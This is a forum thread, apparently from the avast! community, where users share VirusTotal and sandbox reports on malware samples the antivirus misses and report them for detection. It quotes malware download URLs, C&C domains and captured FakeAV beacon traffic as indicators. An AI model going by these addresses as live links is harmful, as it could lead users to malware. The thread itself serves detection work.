http://www.virustotal.com/file-scan/report.html?id=79f63c0da8fe6c841ff52eaaa8d474c0a6b9b370912da3c1731ff1a904ae34cf-1320820260
-
please send this for me....thanks! :-*
Send it yourself. :P
-
i dont want to risk myself....sorry! :-[....but..i want to improve detection! :-[
-
thanks! in advance...please send it! :-*
http://www.virustotal.com/url-scan/report.html?id=5a6f0ab7963f959bca380a63c2c7a716-1321264168
http://www.virustotal.com/file-scan/report.html?id=a162ca722e00ab60820de6b733a90f31d4963128325fecac5f5cc26252f779d4-1321267940
-
i dont want to risk myself....sorry! :-[....but..i want to improve detection! :-[
Well, that's not how this thread works. ;)
-
Well, that's not how this thread works. ;)
Yes i know...but i am sorry...i am just a security freak! :-[ :'(
-
Hi true indian,
You could send the suspicious link to virus AT avast dot com and as long as the link is up and alive they can run the binairy analysis and add detection if found to be malicious.
The analysts should have received them anyway through the channels they use as resources, but some av take a couple of days to be "up to the mark". That is called the vulnerability gap, and it should not be left open too long. Av-solutions are not always overlapping and sometimes complementary. Just check the links you gave here: http://online.us.drweb.com/?url=1 and you see a lot of those you come up with are detected. That is why I have it as a complementary scanner next to avast web rep.
I assume the way Tech intended this thread is to add to detection in a way that one has/downloads a particular undetected file in zipped format and password protected and then send it to virus AT avast dot com with the password to be analyzed and eventually be added to detection. If you want to do that, you should have the VM lab settings for it, know how to work malzilla for instance and run a file in a sandbox environment. You should know how to block script running and be able to determine when to click links or not and you should feel security aware enough,
polonus
-
thanks! for the advice polonus i will try as u said ;D
-
i dont want to risk myself....sorry! ....but..i want to improve detection!
Well, that's not how this thread works. ;)
Yes i know...but i am sorry...i am just a security freak! :-[ :'(
Then you are not a real security freak ;D
-
This VT scan is two days old ;)
thanks i hope it is detected ::)
VirusTotal
http://www.virustotal.com/file-scan/report.html?id=50482d07dbd2004aa05cc6f44b64d5f136b53b6cec9b2692c22a2e6b3e486b27-1321279046
-
thanks! polonus good to see avast is detecting them :)
-
thanks! polonus good to see avast is detecting them :)
wrong name....Pondus and Polonus are not the same 8)
-
thanks! polonus good to see avast is detecting them :)
wrong name....Pondus and Polonus are not the same 8)
;D 8)
-
wrong name....Pondus and Polonus are not the same 8)
HEY! sorry...but thats rhyming ;D 8)...LOL
-
Hi true indian,
Well Pondus and polonus are not the same, but they are cooperating here to analyze malicious URLs etc. Pondus gets a lot of information from polonus and polonus gets a lot of information from pondus. And there are more users in this particular group of conaisseurs, as there is Asyn, Dim@rik, spg SCOTT, and a couple of others,
polonus
-
Batch Oridginal
(AVAST DETECTED THIS ONE)
http://www.virustotal.com/file-scan/report.html?id=716b077fa6b6994753800f6cad425d0b18fb36408809cb7d6f6a27b9d39a6df7-1321326555
Regular EXE
(AVAST DETECTED THIS ONE)
http://www.virustotal.com/file-scan/report.html?id=7dadbe3fad94cdf27d9bc8c88039cdbaadff0a314a87fddfd512460a2c149fc6-1321326379
EXE Virus with password passavast & encrypted
(AVAST DID NOT DETECT THIS ONE)
http://www.virustotal.com/file-scan/report.html?id=d4af3f1ed1573f9b8cd2eab8b33d3ab18cb02529c8ae1f667a218f47cc442347-1321326498
The following files were made 10/23/2011.
On 10/23/2011, the following files had the following reports:
Oridginal Batch; 5/42, Avast Detects
EXE Virus; 6/43, Avast Does NOT Detect
EXE Encrypted and Password Protected; 1/43, Jiangmen Only, Avast Does NOT Detect
Comodo Results (What it does):
-http://camas.comodo.com/cgi-bin/submit?file=7dadbe3fad94cdf27d9bc8c88039cdbaadff0a314a87fddfd512460a2c149fc6
-
http://www.virustotal.com/file-scan/report.html?id=939e021f6a2500a172a3f08f1e734c9fb2f44519f7089cce4bb5fa6012fa51f3-1321373185
sent to avast
-
Thanks for helping improving detection.
-
http://www.virustotal.com/community.html
latest comments columns for VT results...
Sent to avast! by one of my friends.
-
If only the VT comments column was sent, that doesn't help as you need a sample to analyse, comments are of no use.
-
Hi DavidR,
Why true indian's comment? Makes no sense. Normally avast gets these hashes anyway, see: http://ore.carnivore.it/malware/engine/virustotal
As I hope the avast virus analysts will get all the malware there automatically from Engines like VirusTotal, Anubis, CWSandbox to check on. But will they?
Apparently no one there has seen this one yet: http://ore.carnivore.it/malware/hash/b58c7ea56b3343419e7852176fe7ee4d (Avast does not detect),
so we still have to do lots of work for them,
polonus
-
Well it is hard to read true indian's post, but my interpretation of it is I'm not sure if only the VT comments column information was sent to avast or the file and the comments or what was sent.
Yes they get samples, but A) not in a timely fashion and B) they (avast labs member) reported that there is so much junk in there that it isn't that helpful. Which is why I feel it best not to rely on VT sending any sample and send it directly yourself.
-
my friend sent the password protected samples ;)
-
http://www.virustotal.com/file-scan/report.html?id=4c32b819d8f5a08af3180d64d840d3ff0e12f18f9cf5a1e854b0b93fedef0982-1321683454
http://www.virustotal.com/file-scan/report.html?id=5b212d80e06647c698484145a77d6f7179b911c8bf3efe57ea71561149e1ff6c-1320762323
http://www.virustotal.com/file-scan/report.html?id=b541a7647ae211b82baa357681136a1557e5d5e63705fbed45768335063390d4-1321695885
-
L.S.
For the first VT file results given in the row in the previous posting. This info could also be interesting for users to know. Ssome more info about the general threat since November 16th last from Cisco's: http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24212 link info provided by Cisco Threat Outbreak Alert by Cisco threat analysists, so a general mail threat!
polonus
-
http://www.virustotal.com/file-scan/report.html?id=dabe9b890b3af51c56d8990123b2bf6db0cf42c47e6aec7accd455894baf78de-1321792341
http://www.virustotal.com/file-scan/report.html?id=b611fb2dd28d05cdade1e2a7a60bc506503d857214efe4dffe42002585fa2f24-1321792565
-
Unknown google malware not detected here: http://www.virustotal.com/url-scan/report.html?id=7a8c4b07930ab724a8677f5806e7026a-1321906641
http://www.virustotal.com/file-scan/report.html?id=020a56d4541201f4daabe2c2b7c4e059ae6aac7838f073f1fe96e6073ed5d4f5-1321910484
Only Avira detects according to: http://vscan.urlvoid.com/analysis/358e5bf8168f49f29f3849a098da41f2/c2VsbG1lMi1leGU=/
reported to virus AT avast dot com
polonus
-
So-called Toggle-virus to mdl_zeus v2 trojan bot detected by avast:
See: http://www.virustotal.com/url-scan/report.html?id=cb0a29dd89c7b5922bf16e1d92d4fdc8-1322143020
and file scan: http://www.virustotal.com/file-scan/report.html?id=d1522235c1bde90caeb3fe2a01cf20447dc0801c48d55ce168262bfeb11f8a6b-1322146839
See: http://threatcenter.crdf.fr/?More&ID=53545&D=CRDF.Malware.Win32.PEx.9885989241
polonus
-
Undetected malwares
1: http://www.virustotal.com/file-scan/report.html?id=5779c4e1f87bae0c9824cc0d7756eb18872f898b4b8a376450c21cc0af20853f-1322253312
2: http://www.virustotal.com/file-scan/report.html?id=fbebe07698a9131e21d3fe35135170ff66f276206ce8ea7a5f3dc8f03457e67b-1322258316
3: http://www.virustotal.com/file-scan/report.html?id=23ce319fe0bcfb2145c8235ea03c9a88e6f0f1c8a9012ca2566781a18e0df719-1317477939
4: http://www.virustotal.com/file-scan/report.html?id=957ee6fe70f078dde26cba2b7f3c459d46906b9b7e73abfb88c281d02ffa030f-1322262162
-
Not detected by avast TR/Dropper.Gen, see VT reports:
http://www.virustotal.com/url-scan/report.html?id=03eaaf10f32a125d14c7d671088811f2-1322315364
and
http://www.virustotal.com/file-scan/report.html?id=66c2910fdd8a276fa259ee5ebb8a7f6c8c80e9c850e431383835f05deaf997f4-1322319180
polonus
-
Hi folks,
See: http://www.virustotal.com/url-scan/report.html?id=0ae5f16b5624044f5994406e5e1d16ba-1322346824
and
http://sakrare.ikyon.se/log.php?id=19177
see Sucuri detection of mentioned malware:
web site: -http://www.modeplatsen.se
status: Site infected with malware
web trust: Not Blacklisted
Malware found in the URL:
-http://www.modeplatsen.se
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
polonus
-
Virus?
http://www.virustotal.com/file-scan/report.html?id=d5e1bbc7c2338ff9326cb4a698b65a447bd3d9827d2947c39db1d4b4ebba313c-1323115997
-
Virus?
http://www.virustotal.com/file-scan/report.html?id=d5e1bbc7c2338ff9326cb4a698b65a447bd3d9827d2947c39db1d4b4ebba313c-1323115997
Looks like a very old macro for WinWord 95)
-
Hi Dim@rik,
Well a year means ages in computer terms: 2011/01/15 13:57:20 (CET)
But 2008 means a golden oldie:
Detected Jun 15 2008 16:27 GMT
Released Jun 15 2008 21:14 GMT
McAfee Description Modified 2004-06-09
polonus
-
Hi Dim@rik,
Well a year means ages in computer terms: 2011/01/15 13:57:20 (CET)
But 2008 means a golden oldie:
Detected Jun 15 2008 16:27 GMT
Released Jun 15 2008 21:14 GMT
McAfee Description Modified 2004-06-09
polonus
Hi Polonus
Old macro :)
-
@Dim@rik
Stare przeboje.
pozdrawiam,
Damian
-
See: http://www.virustotal.com/url-scan/report.html?id=833ba4370a302059694636f14f1bd217-1323187934
and
http://www.virustotal.com/file-scan/report.html?id=2101461338093052af0a45936d9c1aa6c6fb4546849f192ab2a02a224a8c2bac-1323191725
High risk: http://siteinspector.comodo.com/public/reports/748001
polonus
-
Bookmarked
-
Bookmark it, stickies are a pain in the rear; not long back you had to scroll down to get to the live content too many stickies.
-
Bookmark it, stickies are a pain in the rear; not long back you had to scroll down to get to the live content too many stickies.
+1
-
zeus v2 trojan detection
See: http://www.virustotal.com/url-scan/report.html?id=44fe92bbbdf8dba89791a2d93cb2aa21-1323275210
See: http://www.virustotal.com/file-scan/report.html?id=197073d0ff15cda527ab0eba11614885b533e6cf5d27a359719365e292fad7ed-1323278814
Blacklisted: http://siteinspector.comodo.com/public/reports/754142
reported to virus AT avast dot com
pol
-
Winlock aka Ransom
http://www.virustotal.com/file-scan/report.html?id=b8fd8574cddd5f42cee752b90d335d273ce841b8832226888e796534951145ac-1323284069
http://www.virustotal.com/file-scan/report.html?id=d072a8782c4bf5e7c9d2f8194a52a17775fb0a5171ff76b64f20312e93ed2866-1323284252
exploit pack - Exploit.Java.CVE-2011-3544 (Caught on the same site where the spread blockers)
http://www.virustotal.com/file-scan/report.html?id=e033996289f657e5c3549239049432e1e0c342810eb8a9cabd28dfe070eecdb8-1323284330
Sent to Avast.
Dim@rik
-
W32/Pinkslipbot.gen.as
http://www.virustotal.com/file-scan/report.html?id=9f7b01a804dc29d301c169cd292bf6c8cd88b15ca1e0ee35f47c1aee8f3c9b99-1323436044 (http://www.virustotal.com/file-scan/report.html?id=9f7b01a804dc29d301c169cd292bf6c8cd88b15ca1e0ee35f47c1aee8f3c9b99-1323436044)
-
W32/Pinkslipbot.gen.as
http://www.virustotal.com/file-scan/report.html?id=9f7b01a804dc29d301c169cd292bf6c8cd88b15ca1e0ee35f47c1aee8f3c9b99-1323436044 (http://www.virustotal.com/file-scan/report.html?id=9f7b01a804dc29d301c169cd292bf6c8cd88b15ca1e0ee35f47c1aee8f3c9b99-1323436044)
Nice catch..! :)
-
http://www.virustotal.com/file-scan/report.html?id=305c4e7165d53f37fe537c53c9067518dcc069e55f58473fcba607c5b5d665ba-1323451619 (http://www.virustotal.com/file-scan/report.html?id=305c4e7165d53f37fe537c53c9067518dcc069e55f58473fcba607c5b5d665ba-1323451619)
Rogue.FakeHDD
-
Hi razoreqx,
Same category: http://www.virustotal.com/file-scan/report.html?id=e4e269d9ad00071607b85105055b223b781fc7ab0f0df70f79f084ae0d639304-1323464483
See this analysis, based on same MD5 hash: http://camas.comodo.com/cgi-bin/submit?file=e4e269d9ad00071607b85105055b223b781fc7ab0f0df70f79f084ae0d639304
This is how DrWeb's URL scanner detected this malware:
Checking: -http://46.166.157.31/up_4.exe
Engine version: 5.0.2.3300
Total virus-finding records: 2910580
File size: 169.50 KB
File MD5: 0f38403648d34e9987abf501af245973
-http://46.166.157.31/up_4.exe packed by UPX
>-http://46.166.157.31/up_4.exe infected with BackDoor.IRC.NgrBot.42
reported to virus AT avast dot com,
polonus
-
Winlock aka Ransom
http://www.virustotal.com/file-scan/report.html?id=9533fad13324e0aa16ec9d7250753a28ea7ec1972c946c0dd9eb502ffd73372d-1323503872
http://www.virustotal.com/file-scan/report.html?id=b71cc22b75dde1610ba065151f87735d2715c4d4414846a68aca9b59dae9874b-1323504047
http://www.virustotal.com/file-scan/report.html?id=4b5a061be2f901a13ecb6b53cb3bf5ba111ae5cf53187cd7fae496d6822040ab-1323545076
http://www.virustotal.com/file-scan/report.html?id=cc8b56624eb01e5b1ed97176beee1069a0feedd3a889df726797b22e63efb8f1-1323545889
reported to virus AT avast dot com
-
http://www.virustotal.com/file-scan/report.html?id=afe2dad20ed7197d4c5ea434754a8244ab74dca897eed1be406c49312410911f-1323690671 (http://www.virustotal.com/file-scan/report.html?id=afe2dad20ed7197d4c5ea434754a8244ab74dca897eed1be406c49312410911f-1323690671)
Win32/Kryptik.XDF
Sample uploaded
-
http://www.virustotal.com/file-scan/report.html?id=e0418aedec38ddd20ec322c736c1090f88de9522d00f49289c8cabb65e91d35d-1323691928 (http://www.virustotal.com/file-scan/report.html?id=e0418aedec38ddd20ec322c736c1090f88de9522d00f49289c8cabb65e91d35d-1323691928)
Rogue.FakeRean
Sample uploaded.
GET /SecureKit2011.exe HTTP/1.0
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hxxp://ihbbdbungles.info/global-scan/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; WinTSI 08.01.2010; .NET4.0C; .NET4.0E)
Host: ihbbdbungles.info
Connection: keep-alive
Via: 1.1 OHAEPHQAS700
HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sun, 11 Dec 2011 19:40:22 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Last-Modified: Sun, 11 Dec 2011 19:37:03 GMT
ETag: "4e6d9e-44e00-4b3d6247715c0"
Accept-Ranges: bytes
Content-Length: 282112
-
VirusTotal - 10/43 - SkyKeygen Avast 6.x.x.exe
http://www.virustotal.com/file-scan/report.html?id=794c9496ba67d57f2efcbe14ad1c7ce3e4f8744d7c73933b31f9f918cffd79bf-1323722776
soon in avast inbox ;)
ThreatExpert
http://www.threatexpert.com/report.aspx?md5=3687024420926c956f6260405aa08592
-
Trogjan.FakeAlert
file: scandsk.exe
http://virusscan.jotti.org/en/scanresult/0fb58945fd6cadafc9c03010c7bceebc5691a315 (http://virusscan.jotti.org/en/scanresult/0fb58945fd6cadafc9c03010c7bceebc5691a315)
http://www.metascan-online.com/results.cgi?uid=gu4camxrse0oaaci043y25zp5tn4p9cx (http://www.metascan-online.com/results.cgi?uid=gu4camxrse0oaaci043y25zp5tn4p9cx)
ThreatExpert.
http://www.threatexpert.com/report.aspx?md5=8fa84e89b3d20659a6c9aec9bb5b0829 (http://www.threatexpert.com/report.aspx?md5=8fa84e89b3d20659a6c9aec9bb5b0829)
Sample Sent.
-
Zeus config url not detected Zeus C&C everest-club dot ru: http://vscan.urlvoid.com/analysis/b1bf3c1430056ba2fefcc718f8e3be29/d2UtZXhl/
See: http://siteinspector.comodo.com/public/reports/show_log?id=5953
polonus
-
Trojan.Karagany
http://www.virustotal.com/file-scan/report.html?id=6e8ef8e2e14589787c54add5673570491a577473fae45e1eca626ff71a075369-1323876452 (http://www.virustotal.com/file-scan/report.html?id=6e8ef8e2e14589787c54add5673570491a577473fae45e1eca626ff71a075369-1323876452)
http://camas.comodo.com/cgi-bin/submit?file=6e8ef8e2e14589787c54add5673570491a577473fae45e1eca626ff71a075369 (http://camas.comodo.com/cgi-bin/submit?file=6e8ef8e2e14589787c54add5673570491a577473fae45e1eca626ff71a075369)
http://www.threatexpert.com/report.aspx?md5=59392f88262a30db38f29486b46bb7b6 (http://www.threatexpert.com/report.aspx?md5=59392f88262a30db38f29486b46bb7b6)
-
Undetected, PUP, riskware or FP?
http://www.virustotal.com/url-scan/report.html?id=6c9e59e62b725654da98b9bf4be2927b-1323874134
&
http://www.virustotal.com/url-scan/report.html?id=6c9e59e62b725654da98b9bf4be2927b-1323874134
&
http://camas.comodo.com/cgi-bin/submit?file=9fa77a2795e02b6c3932a517cb573eb520c2421c9d78f79a003b4e06eb91fcce&iframe=
last scan gives undetected... see: http://urlquery.net/queued.php?id=11825 (suspicious)
polonus
-
See: http://www.virustotal.com/url-scan/report.html?id=a194e954d39c0dd69ffb05f6c652e712-1323874466
&
http://www.virustotal.com/file-scan/report.html?id=8d08a15049f68e1352f08b2ac0b32b8d642c176801821811a235bf6ddf6bcc1a-1323878220
Here detected by DrWeb URL checker:
-http://u.websuprt.co.kr/NewSidebar/webSupporter/webSurt.exe
Engine version: 5.0.2.3300
Total virus-finding records: 2928866
File size: 317.96 KB
File MD5: 5b1c5f2547628a212d403abd3f62cc9b
-http://u.websuprt.co.kr/NewSidebar/webSupporter/webSurt.exe contains an advertising software Adware.Searcher.1334
reported to vrtus AT avast dot com, could be added as PUP (so won't be seen, but can be added)
pol
-
Submitted via Virus Chest.
http://virusscan.jotti.org/en/scanresult/6aaefaeb55cdae5e001f9b6f4e29b4049772e971 (http://virusscan.jotti.org/en/scanresult/6aaefaeb55cdae5e001f9b6f4e29b4049772e971)
http://www.threatexpert.com/report.aspx?md5=b69811163d48fc9ef16a939242dcbacc (http://www.threatexpert.com/report.aspx?md5=b69811163d48fc9ef16a939242dcbacc)
-
WORM/Dorkbot.AD.1 not detected: http://www.virustotal.com/file-scan/report.html?id=ca156ba8d276e76787e6d433a392c8f3dc9755d9954e7bcb6d5c68d80b1cd663-1323989079
See: http://camas.comodo.com/cgi-bin/submit?file=ca156ba8d276e76787e6d433a392c8f3dc9755d9954e7bcb6d5c68d80b1cd663
and
http://www.threatexpert.com/report.aspx?md5=1b52eeaf196290fade3a8c1ad62a8710
malicious: http://urlquery.net/report.php?id=12105
reported to virus AT avast dot com
polonus
-
See: http://www.virustotal.com/url-scan/report.html?id=ef0c31e8e60340a67f8a046f78e5d78c-1324059347
&
http://www.virustotal.com/file-scan/report.html?id=ca060c4b10b6a548cc50539ba38586fe51cee2cfc9bd27e5a83ccc74e333fccc-1324062950
TROJ_PIDEX.SMJ not detected
anubis analysis report: http://anubis.iseclab.org/?action=result&task_id=117cadcbdf18399f4792ad31722f749db
polonus
-
TR/PSW.Zbot.Y.2067 not detected:
http://www.virustotal.com/url-scan/report.html?id=6acdbdc39e21f86dd10d720857812e41-1324060092
&
http://www.virustotal.com/file-scan/report.html?id=2c07f90d8890b04ef45528869daae4b9e307a94cb8a8e14801379b23a0a4bff4-1324063832
reported to virus at avast dot com
Well and this one was in their own back garden, abuse at nethost dot cz
D
-
Detection of EXP/SWF.AH missed:
See: http://www.virustotal.com/url-scan/report.html?id=ab5f83eeac09e5ba58b7dbae15d7f1ff-1324127882
and
http://www.virustotal.com/file-scan/report.html?id=c2b39f12699301b18eba51660dd2e3991d58f3a48c2cf2dbb972e5110abc20ba-1324134052
Malware galore there: http://www.google.com/safebrowsing/diagnostic?site=http%3A//chat4freelab.in/content/field.swf
reported to virus AT avast dot com
polonus
-
Detection missed for worm: http://www.virustotal.com/url-scan/report.html?id=e9ad4368a9d455a0cc25c9671634b9bb-1324214647
and
http://www.virustotal.com/file-scan/report.html?id=98bce191023c09a8c0265668a1f8fedc05baeed2fba3d15bab3acad07132e13d-1324218382
polonus
-
Undetected malwares
1: http://www.virustotal.com/file-scan/report.html?id=c16438de2cf1615ff5775ff8c3a6dfcd6c28b3490e611b02a26d7fe884e90aad-1324245994
2: http://www.virustotal.com/file-scan/report.html?id=0c59457bd4abeb6a7fb824ef9c297eb60ae5f8fa6b0a5966c93a39ef6165d7ce-1324246777
-
Is this the same by the way http://www.virustotal.com/file-scan/report.html?id=0c59457bd4abeb6a7fb824ef9c297eb60ae5f8fa6b0a5966c93a39ef6165d7ce-1324246777
a keyfinder set/up executable
polonus
-
http://www.virustotal.com/file-scan/report.html?id=9596cc829ec3aa8698d641822f552ae9a9aaed988706e3f89992d593fe71f318-1324299135 (http://www.virustotal.com/file-scan/report.html?id=9596cc829ec3aa8698d641822f552ae9a9aaed988706e3f89992d593fe71f318-1324299135)
http://virusscan.jotti.org/en/scanresult/0ff465579a7ce5235bf37c1429673cbe736b0586 (http://virusscan.jotti.org/en/scanresult/0ff465579a7ce5235bf37c1429673cbe736b0586)
http://urlquery.net/report.php?id=12565 (http://urlquery.net/report.php?id=12565)
-
mdl_trojan Winlock/FakePoliceAlert to unknown_exe miised by avast see:
http://www.virustotal.com/file-scan/report.html?id=e874026aeae1c7182d8155dc2ca76887e1b31bd882f3626a56b7a0d3a9dc4531-1324293612
see: -http://urlquery.net/report.php?id=12533
WOT would stop you to go there any way because of very bad web rep:
http://www.webutation.net/go/review/git7868777777777.nl.ai
pol
-
http://virusscan.jotti.org/en/scanresult/f5df750c0717aefbc74bc8686f0f117f0c7acb36 (http://virusscan.jotti.org/en/scanresult/f5df750c0717aefbc74bc8686f0f117f0c7acb36)
https://www.virustotal.com/file-scan/report.html?id=737e2c8e1729b860c65e4daf012e7eb4ec9855a9701ea3997626bb37167790dc-1324305873 (https://www.virustotal.com/file-scan/report.html?id=737e2c8e1729b860c65e4daf012e7eb4ec9855a9701ea3997626bb37167790dc-1324305873)
-
Hi razoreqx,
Good find. PM-ed you about whyI think it is definitely trojan malcode i.m.o. Thanks for adding to avast detection,
pol
-
Hi razoreqx,
Good find. PM-ed you about whyI think it is definitely trojan malcode i.m.o. Thanks for adding to avast detection,
pol
No thanks to you my friend! You're an amazing researcher (and a good teacher)!
-
http://virusscan.jotti.org/en/scanresult/580122ddae9bdcd79e09be0e397b1c80d1427e20/9a541f483fd5cef441aeb764d0b2622966a5f342 (http://virusscan.jotti.org/en/scanresult/580122ddae9bdcd79e09be0e397b1c80d1427e20/9a541f483fd5cef441aeb764d0b2622966a5f342)
http://www.virustotal.com/file-scan/report.html?id=67de3f40a965cda98a4e1485d05cb2b22c754e9cb6ae11da019fcca774e9f293-1324310635 (http://www.virustotal.com/file-scan/report.html?id=67de3f40a965cda98a4e1485d05cb2b22c754e9cb6ae11da019fcca774e9f293-1324310635)
https://anubis.iseclab.org/?action=result&task_id=1f66db2b0f30ceea42dc774349e143d39&format=html (https://anubis.iseclab.org/?action=result&task_id=1f66db2b0f30ceea42dc774349e143d39&format=html)
Trojan.Dropper
-
http://www.virustotal.com/file-scan/report.html?id=9c6008d77f2486a143405d295cb57729d8c8759bf4515aaa2f6b6fea149ce3f5-1324311747 (http://www.virustotal.com/file-scan/report.html?id=9c6008d77f2486a143405d295cb57729d8c8759bf4515aaa2f6b6fea149ce3f5-1324311747)
http://virusscan.jotti.org/en/scanresult/36084b8cef9c33f286ed25e79a2d422978ed6c61 (http://virusscan.jotti.org/en/scanresult/36084b8cef9c33f286ed25e79a2d422978ed6c61)
FakeAV.HDD
Server DNS Name: manateigolkey.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) manateigolkey.com
Others Cache-Control: no-cache
Server DNS Name: thelangleuber.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) thelangleuber.com
Others Cache-Control: no-cache
Server DNS Name: sixboysowners.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) sixboysowners.com
Others Cache-Control: no-cache
Server DNS Name: lotughtdenve.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) lotughtdenve.com
Others Cache-Control: no-cache
Server DNS Name: gelongotbalebs.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /?ylOdR9GQqXquMlTvsmXlkaz1x3EX+A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) gelongotbalebs.com
Others Cache-Control: no-cache
Server DNS Name: shatretodangun.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) shatretodangun.com
Others Cache-Control: no-cache
Server DNS Name: cozumesubar.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) cozumesubar.com
Others Cache-Control: no-cache
Server DNS Name: rubesolanolex.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /up.php?0Q9oBPXEN0uECUgzEJ95RQsagj3vq1aG3F/2q5oNqwOd0A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) rubesolanolex.com
Others Cache-Control: no-cache
Server DNS Name: zownerubpres.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /?ylOdR9GQqXquMlTvsmXlkaz1x3EX+A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) zownerubpres.com
Others Cache-Control: no-cache
Server DNS Name: nuberolubenyc.com Service Port: 80
Direction Command User-Agent Host Connection Pragma
GET /?ylOdR9GQqXquMlTvsmXlkaz1x3EX+A== HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) nuberolubenyc.com
Others Cache-Control: no-cache
-
Not detected by avast - TR/Crypt.CFI.Gen- see: http://www.virustotal.com/url-scan/report.html?id=132341ba37080f8939a990e881d2502c-1324301045
and
http://www.virustotal.com/file-scan/report.html?id=bda30a652d09b6786feada3c8a44e1258d20df0bc9525986e16b3b7c28b1e787-1324304650
polonus
-
http://www.virustotal.com/file-scan/report.html?id=0b529def03e6fe2e97684b1431b2f97b22ad1347bf513c275ff6a43011b0925c-1324391090 (http://www.virustotal.com/file-scan/report.html?id=0b529def03e6fe2e97684b1431b2f97b22ad1347bf513c275ff6a43011b0925c-1324391090)
https://anubis.iseclab.org/?action=result&task_id=1843010ff24a4968479ef2f65debdcdf4&format=html (https://anubis.iseclab.org/?action=result&task_id=1843010ff24a4968479ef2f65debdcdf4&format=html)
http://www.threatexpert.com/report.aspx?md5=ede031e94dba203b2d027e2334a4c352 (http://www.threatexpert.com/report.aspx?md5=ede031e94dba203b2d027e2334a4c352)
-
@razoreqx
That looks like a CNET download installer.....FP ?.....or does it comes with AdWare
sigcheck:
publisher....: CNET Download.com
copyright....: CBS Interactive
product......: CNET Download.com Installer
description..: CNET Download.com Install
original name: n/a
internal name: CNET Download.com Installer
file version.: v2.0.2.108
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
-
@razoreqx
That looks like a CNET download installer.....FP ?
sigcheck:
publisher....: CNET Download.com
copyright....: CBS Interactive
product......: CNET Download.com Installer
description..: CNET Download.com Install
original name: n/a
internal name: CNET Download.com Installer
file version.: v2.0.2.108
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
Got the ThreatExpert report back on that too. Remind me never to download anything from cNET!!
Im not sure I would call this FP. Did you see the remote host calls?
00000000 | 3041 3043 7A75 7443 3051 7443 3046 7442 | 0A0CzutC0QtC0FtB
00000010 | 3057 7443 3047 7443 3049 7443 3046 7443 | 0WtC0GtC0ItC0FtC
00000020 | 3054 7443 3051 325A 3046 7443 3052 7443 | 0TtC0Q2Z0FtC0RtC
00000030 | 3046 7443 3048 744E 3050 3143 3049 3044 | 0FtC0HtN0P1C0I0D
00000040 | 7A75 3151 3147 3149 3151 7446 3152 3146 | zu1Q1G1I1QtF1R1F
00000050 | 3148 744E 3055 3049 3044 7A75 7444 7444 | 1HtN0U0I0DzutDtD
00000060 | 7444 3043 7442 7A79 3043 3042 7443 7A7A | tD0CtBzy0C0BtCzz
00000070 | 7942 7443 3044 7443 3041 7945 7444 744E | yBtC0DtC0AyEtDtN
00000080 | 3057 3056 7A75 7944 7446 7443 744E 3057 | 0W0VzuyDtFtCtN0W
00000090 | 3053 3050 7A75 7442 744E 3050 3143 3053 | 0S0PzutBtN0P1C0S
000000A0 | 3259 3153 7A75 744A 3156 3057 3150 3043 | 2Y1SzutJ1V0W1P0C
000000B0 | 3154 3143 3150 744E 3052 3053 7A75 7449 | 1T1C1PtN0R0SzutI
000000C0 | 744E 3054 304B 7A75 7944 7442 7943 7943 | tN0T0KzuyDtByCyC
000000D0 | 7A7A 744E 3057 3150 3043 3154 3143 3150 | zztN0W1P0C1T1C1P
000000E0 | 3053 3150 3142 3142 314C 3146 3147 7A75 | 0S1P1B1B1L1F1Gzu
000000F0 | 7443 7A79 7942 7942 3154 7944 3151 3152 | tCzyyByB1TyD1Q1R
